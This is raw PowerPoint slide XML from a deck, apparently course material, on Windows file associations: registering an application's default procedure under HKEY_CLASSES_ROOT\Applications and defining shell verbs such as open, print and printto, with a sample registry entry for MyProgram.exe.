          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To register the default procedure, place the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>created for your application's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProgID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> under the application's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>subkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can also include a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FriendlyAppName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> value to provide the system with a friendly name for your application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>application's friendly name may also be extracted from its executable file, but only if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FriendlyAppName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> value is absent.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80</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>rocedure  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28505216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81</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW"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18177"/>
            <a:ext cx="8589887" cy="434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1085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The following sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> illustrates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>default procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyProgram.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that defines a friendly name and several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>shortcut menu items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>command strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> include the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> flag to notify the application that it is opening an arbitrary file type. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>you include a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DefaultIcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then you should use a generic icon.</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82</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27318191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2060848"/>
            <a:ext cx="8928991" cy="4464495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> MyProgram.exe</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   shell</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     open</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    command</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Default) = C:\MyDir\MyProgram.exe /a "%1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    print</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a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     command</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a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (Default) = C:\MyDir\MyProgram.exe /a /p "%1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printto</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a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (Default) = C:\MyDir\MyProgram.exe /a /p "%1" "%2"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253583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84</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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14" y="1772816"/>
            <a:ext cx="8936682" cy="44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2162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AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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6"/>
            <a:ext cx="8072586" cy="4052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0169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2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shell Verb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> represents a shell verb registration or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>unregistration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is a child of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>File Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and is used to associate applications with the file types that they handle. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
